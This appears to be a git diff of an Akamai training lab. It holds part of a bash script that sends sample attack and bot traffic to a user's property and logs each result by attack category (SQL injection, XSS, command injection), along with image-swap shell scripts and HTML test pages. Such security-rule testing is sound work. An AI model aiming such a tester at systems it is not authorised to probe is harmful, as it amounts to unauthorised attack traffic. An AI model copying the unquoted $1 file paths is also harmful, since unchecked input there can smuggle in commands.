$CURL $CURLARGS "$URL" -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values" -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" &> .temp
fi
echo "checker" >> .temp
regexhtc='^HTTP\/[0-9]\.[0-9][ ]([[:digit:]]{3})|^curl:.*error: (.*)|^HTTP/2[ ]([[:digit:]]{3})'
regexref='(#|[[:space:]])([[:digit:]]+\.[a-zA-Z0-9]+\.[a-zA-Z0-9]{10,}\.[a-zA-Z0-9]+)'
regexdie='.*doctype.*|^(^$)$'
stopv=0
http="Timeout"
refe="Unable to get AK_REFERENCE_ID"
while IFS= read -r liner; do
liner="${liner//&#46;/.}"
liner="${liner//&#35;/#}"
if [[ $liner =~ $regexhtc ]]; then http="${BASH_REMATCH[1]}${BASH_REMATCH[2]}${BASH_REMATCH[3]}"; http=${http%$'\r'}; http=${http%$' '}; fi
if [[ $liner =~ $regexref ]]; then refe="${BASH_REMATCH[2]}"; fi
if [ $verbose -eq 1 ]; then if ! [[ $liner =~ $regexdie || $stopv -eq 1 ]]; then echo "$liner"; else stopv=1; fi; fi
done < .temp
echo -e "${http}"
# echo -e "${epoch}"
# echo -e "${refe}"
echo -e ""
if [[ ${filetim} != '' ]]; then exportcsv; fi
else
echo -e 'Oops... wrong method!'
exit
fi
}
property=$3
verbose=0
filetim=""; filecnf=""; fileref=""
PFIPi=""; PEIPi=""; SFIPi=""; SEIPi=""
PFIP="23.54.162.184:23.63.22.131:23.63.22.169:186.177.65.217:186.177.65.208"
PEIP="72.246.84.4:23.40.180.4:23.48.16.4"
SFIP="23.50.49.10:23.50.55.19:23.50.55.25:23.50.51.50:23.50.51.51"
SEIP="23.199.36.2:23.34.4.4:23.59.184.2"
PFFQ="a1.g.akamai.net"
PEFQ="e1.a.akamaiedge.net"
SFFQ="a1.g.akamai-staging.net"
SEFQ="e1.a.akamaiedge-staging.net"
rules=()
headerorder=()
while getopts "c:r:vedm" option; do
case $option in
c)
filecnf=${OPTARG};;
v)
verbose=1 ;;
r)
fileref=${OPTARG};;
e)
filetim=$(date +%s) ;;
d)
PFIP=""
PEIP=""
SFIP=""
SEIP="";;
m)
helpconf
exit;;
esac
done
if (( $OPTIND == 1 )); then
help
exit
fi
if [[ ${filetim} != '' ]]; then
export_type=""
export_payload=""
ACRONYMA=('man' 'atg' 'bms' 'bmp' 'krs-cmd' 'krs-xss' 'krs-dos' 'krs-iht' 'krs-php' 'krs-rfi' 'krs-sql' 'krs-trj' 'aag-wat' 'aag-wpr' 'aag-sql' 'aag-xss' 'aag-lfi' 'aag-rfi' 'aag-cmi' 'aag-wpl' 'penalty' 'aka-arb' 'aka-asc' 'aka-bib' 'aka-eco' 'aka-eag' 'aka-fia' 'aka-fis' 'aka-job' 'aka-mda' 'aka-new' 'aka-onl' 'aka-rss' 'aka-seo' 'aka-sit' 'aka-soc' 'aka-war' 'aka-wse' 'tra-ikb' 'tra-dvf' 'tra-htl' 'tra-wsl' 'tra-osc' 'tra-hbt' 'tra-dcb' 'tra-agc' 'tra-req' 'act-cok')
ACRONYMB=('Manual' 'Attack Group' 'Bot Manager Standard' 'Bot Manager Premier' 'Command Injection' 'Cross-Site Scripting' 'DDOS' 'Invalid HTTP' 'PHP Injection' 'Remote File Inclusion' 'SQL Injection' 'Trojan' 'Web Attack Tool' 'Web Protocol Attack' 'SQL Injection' 'Cross-Site Scripting' 'Local File Inclusion' 'Remote File Inclusion' 'Command Injection' 'Web Platform Attack' 'Penalty Box' 'Academic or Research Bots' 'Automated Shopping Cart and Sniper Bots' 'Business Intelligence Bots' 'E-Commerce Search Engine Bots' 'Enterprise Data Aggregator Bots' 'Financial Account Aggregator Bots' 'Financial Services Bots' 'Job Search Engine Bots' 'Media or Entertainment Search Bots' 'News Aggregator Bots' 'Online Advertising Bots' 'RSS Feed Reader Bots' 'SEO Analytics or Marketing Bots' 'Site Monitoring and Web Development Bots' 'Social Media or Blog Bots' 'Web Archiver Bots' 'Web Search Engine Bots' 'Impersonators of Known Bots' 'Development Frameworks' 'HTTP Libraries' 'Web Services Libraries' 'Open Source Crawlers/Scraping Platforms' 'Headless Browsers/Automation Tools' 'Declared Bots (Keyword Match)' 'Aggressive Web Crawlers' 'Request Anomaly' 'Cookie Integrity Failed' 'Cookie Integrity Failed')
if [ $verbose -eq 1 ]; then echo -e "> exporting $(basename ${filecnf})_${filetim}.csv"; fi
echo "Environment,HTTP Code,Checker reference,Akamai reference,Type,Payload,URL" > "$(basename ${filecnf})_${filetim}.csv"
fi
readconfig $filecnf $property

15
app/flask/scripts/replaceImage.sh Normal file
View File

@ -0,0 +1,15 @@
#! /bin/bash
cd /usr/share/nginx/html/learn
export oldDog=$(cat $1_dog.txt)
echo 'oldDog: '$oldDog
if [ $oldDog = 'cream' ];then
cp golden.png.bak $1_dog.png
echo golden > $1_dog.txt
echo 'newDog: golden'
elif [ $oldDog = 'golden' ];then
cp cream.png.bak $1_dog.png
echo cream > $1_dog.txt
echo 'newDog: cream'
fi;

15
app/flask/scripts/replaceVideo.sh Normal file
View File

@ -0,0 +1,15 @@
#! /bin/bash
cd /usr/share/nginx/html/learn
export oldVideo=$(cat $1_video.txt)
echo 'oldVideo: '$oldVideo
if [ $oldVideo = 'globe' ];then
cp akam.mp4.bak $1_video.mp4
echo akam > $1_video.txt
echo 'newVideo: akam'
elif [ $oldVideo = 'akam' ];then
cp globe.mp4.bak $1_video.mp4
echo globe > $1_video.txt
echo 'newVideo: globe'
fi;

79
app/flask/templates/bm.html Normal file
View File

@ -0,0 +1,79 @@
<!-- This is the updated HTML file that uses w3.js and w3.css -->
<!DOCTYPE html>
<html>
<head>
<title>Bot Manager Test</title>
<!-- Add the links to w3.js and w3.css -->
<script src="https://www.w3schools.com/lib/w3.js"></script>
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
</head>
<body>
<div class="w3-container" id="root" style="max-width:1400px;margin:auto;">
<div class="w3-container w3-teal">
<h1>Bot Manager Test</h1>
</div>
<div class="w3-container w3-pale-blue">
<p id="">Click the button to send sample bot traffic to your ${PROPERTY_HOSTNAME}.</p>
<button class="w3-button w3-blue" onclick="runTest()">START TEST</button>
<p></p>
</div>
<div class="w3-container w3-dark-grey">
<p id="">Test result</p>
</div>
<div id="loading" class="w3-modal w3-animate-zoom w3-animate-opacity">
<div class="w3-modal-content w3-card-4" style="width:350px;">
<div class="w3-container">
<img class="w3-circle" style="width:100%;" src="/learn/loading.gif" />
</div>
<div class="w3-container">
<p>&nbsp; Sending sample bot traffic...</p>
<p>&nbsp; This can take around 1 minute.</p>
<br/>
</div>
</div>
</div>
<div class="w3-container w3-light-grey">
<div class="" id="output">
</div>
</div>
</div>
<script>
var hostname = location.hostname;
var array = hostname.split('.');
uid = array[0];
console.log(uid);
function runTest() {
document.getElementById("output").innerHTML = "";
w3.getHttpObject('/lab/bm/run?property=' + uid, showOutput);
document.getElementById("loading").style.display = "block";
}
function showOutput(output) {
// document.getElementById("output").innerHTML += '<p>##### This tester sent the following Bot traffic to your property. #####</p>'
document.getElementById("output").innerHTML += '<p><b>UTC Time : [ Akamai Network Type ] [Bot Type], Test URL, Response Code</b></p>'
// console.log(output);
const outputArray = output.toString().split('\t');
// console.log(outputArray);
for (var i = 0; i < outputArray.length; i++) {
var line = outputArray[i];
// console.log(line);
document.getElementById("output").innerHTML += line + '<br/>';
}
document.getElementById("output").innerHTML += '<br/><p>##### Go to your Security Center to monitor this Bot traffic. #####</p>'
document.getElementById("output").innerHTML += '<p></p><p></p>'
document.getElementById("loading").style.display = "none";
}
</script>
</body>
</html>

241
app/flask/templates/ivm.html Normal file
View File

@ -0,0 +1,241 @@
<!-- This is the updated HTML file that uses w3.js and w3.css -->
<!DOCTYPE html>
<html>
<head>
<title>Image & Video Manager Purge</title>
<!-- Add the links to w3.js and w3.css -->
<script src="https://www.w3schools.com/lib/w3.js"></script>
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<style>
p{
font-size:small;
}
</style>
</head>
<body>
<div class="w3-container" id="root" style="max-width:1400px;margin:auto;">
<div class="w3-container w3-teal">
<h1>Image & Video Manager Purge Test</h1>
</div>
<div class="w3-container w3-pale-blue" id="button1">
<p id="">Click the button to start. Your images and videos will be shown below.</p>
<button class="w3-button w3-blue" onclick="generateImageVideo()">Generate Image and Video</button>
<p></p>
</div>
<div class="w3-container w3-black" id="msg1">
<h4>NOTE: Please open 'Developer Tools' and check 'Disable Cache' option under 'Network' tab.</h4>
</div>
<div id="loading" class="w3-modal w3-animate-zoom w3-animate-opacity">
<div class="w3-modal-content w3-card-4">
<img class="w3-circle" style="width:100%"
src="https://i.pinimg.com/originals/9f/5b/a6/9f5ba6b38c4259a23c5965a8164ec86f.gif" />
</div>
</div>
<div class="w3-container w3-light-grey" id="body">
<div class="w3-row-padding w3-margin-top">
<div class="w3-third">
<div class="w3-card w3-white">
<div class="w3-display-container">
<img id="originImage" src="http://origin-33.akamai-lab.com/learn/black.jpg"
style="width:100%">
<div class="w3-display-topright w3-container">
<button class="w3-button w3-blue w3-border w3-ripple" onclick="replaceImage()">Click to
Replace</button>
</div>
</div>
<div class="w3-container">
<h5>Origin Image</h5>
<p id="originImageURL"></p>
</div>
</div>
</div>
<div class="w3-third">
<div class="w3-card w3-white">
<div class="w3-display-container">
<img id="cachedImage" src="http://origin-33.akamai-lab.com/learn/black.jpg"
style="width:100%">
<div class="w3-display-topright w3-container">
<button class="w3-button w3-blue w3-border w3-ripple" onclick="reloadImage()">Click to
Reload</button>
</div>
</div>
<div class="w3-container">
<h5>Optimized Image</h5>
<p id="cachedImageURL"></p>
</div>
</div>
</div>
<div class="w3-third">
<div class="w3-card w3-white">
<div class="w3-display-container">
<img id="cachedImage2" src="http://origin-33.akamai-lab.com/learn/black.jpg"
style="width:100%">
<div class="w3-display-topright w3-container">
<button class="w3-button w3-blue w3-border w3-ripple" onclick="reloadImage2()">Click to
Reload</button>
</div>
</div>
<div class="w3-container">
<h5>Optimized Image with custom query string</h5>
<p id="cachedImageURL2"></p>
</div>
</div>
</div>
</div>
<div class="w3-row-padding w3-margin-top">
<div class="w3-half">
<div class="w3-card w3-white w3-display-container">
<video style="width:100%;" controls autoplay id="originVideo">
<source src="http://origin-33.akamai-lab.com/learn/sample23.mp4" type="video/mp4">
Your browser does not support the video tag.
</video>
<div class="w3-display-topright w3-container">
<button class="w3-button w3-blue w3-border w3-ripple" onclick="replaceVideo()">Click to
Replace</button>
</div>
<div class="w3-container">
<h5>Origin Video</h5>
<p id="originVideoURL"></p>
</div>
</div>
</div>
<div class="w3-half">
<div class="w3-card w3-white w3-display-container">
<video style="width:100%;" controls autoplay id="cachedVideo">
<source src="http://origin-33.akamai-lab.com/learn/sample23.mp4" type="video/mp4">
Your browser does not support the video tag.
</video>
<div class="w3-display-topright w3-container">
<button class="w3-button w3-blue w3-border w3-ripple" onclick="reloadVideo()">Click to
Reload</button>
</div>
<div class="w3-container">
<h5>Optimized Video</h5>
<p id="cachedVideoURL"></p>
</div>
</div>
</div>
</div>
<p>&nbsp;</p>
</div>
</div>
<script>
var browserName = navigator.userAgent.toLowerCase();
var isChrome = browserName.indexOf("chrome") > -1;
if (!isChrome) {
alert("Your web browser is not compatible with this page. Please use Chrome or Chrome-compatible browser.");
}
var hostname = location.hostname;
var array = hostname.split('.');
uid = array[0];
console.log(uid);
// document.getElementById("body").style.display = "none";
function generateImageVideo() {
// document.getElementById("msg1").style.display = "none";
document.getElementById("button1").style.display = "none";
generate();
}
function generate() {
w3.getHttpObject('/lab/ivm/generate?property=' + uid, setSrc);
}
function setSrc() {
var originImageSrc = 'http://origin-33.akamai-lab.com/learn/' + uid + '_dog.png';
console.log(originImageSrc);
document.getElementById("originImage").src = originImageSrc;
document.getElementById("originImageURL").innerHTML = originImageSrc;
var cachedImageSrc = 'http://' + hostname + '/learn/' + uid + '_dog.png';
console.log(cachedImageSrc);
document.getElementById("cachedImage").src = cachedImageSrc;
document.getElementById("cachedImageURL").innerHTML = cachedImageSrc;
var cachedImageSrc2 = cachedImageSrc+'?uid=1234'
// var cachedImageSrc2 = cachedImageSrc+'?im=Grayscale&uid=1234'
console.log(cachedImageSrc2);
document.getElementById("cachedImage2").src = cachedImageSrc2;
document.getElementById("cachedImageURL2").innerHTML = cachedImageSrc2;
var originVideoSrc = 'http://origin-33.akamai-lab.com/learn/' + uid + '_video.mp4';
console.log(originVideoSrc);
document.getElementById("originVideo").getElementsByTagName("source")[0].src = originVideoSrc;
document.getElementById("originVideo").load();
document.getElementById("originVideoURL").innerHTML = originVideoSrc;
var cachedVideoSrc = 'http://' + hostname + '/learn/' + uid + '_video.mp4';
console.log(cachedVideoSrc);
document.getElementById("cachedVideo").getElementsByTagName("source")[0].src = cachedVideoSrc;
document.getElementById("cachedVideo").load();
document.getElementById("cachedVideoURL").innerHTML = cachedVideoSrc;
document.getElementById("body").style.display = "block";
}
function replaceImage() {
w3.getHttpObject('/lab/ivm/replace_image?property=' + uid, showImageOutput);
}
function replaceVideo() {
w3.getHttpObject('/lab/ivm/replace_video?property=' + uid, showVideoOutput);
}
function reloadImage() {
// Chrome, Brave
var image = document.getElementById("cachedImage");
var url = image.src;
image.src = url+'';
console.log('cachedImage reloaded');
//FireFox, Edge, Safari
//location.reload();
}
function reloadImage2() {
// Chrome, Brave
var image = document.getElementById("cachedImage2");
var url = image.src;
image.src = url;
console.log('cachedImage reloaded');
//FireFox, Edge, Safari
//location.reload();
}
function reloadVideo() {
document.getElementById("cachedVideo").load();
console.log('cachedVideo reloaded');
}
function showImageOutput(output) {
// Chrome, Brave
var image = document.getElementById("originImage");
var url = image.src;
image.src = url;
// FireFox, Edge, Safari
// location.reload();
console.log(output);
}
function showVideoOutput(output) {
var video = document.getElementById("originVideo");
video.load();
console.log(output);
}
</script>
</body>
</html>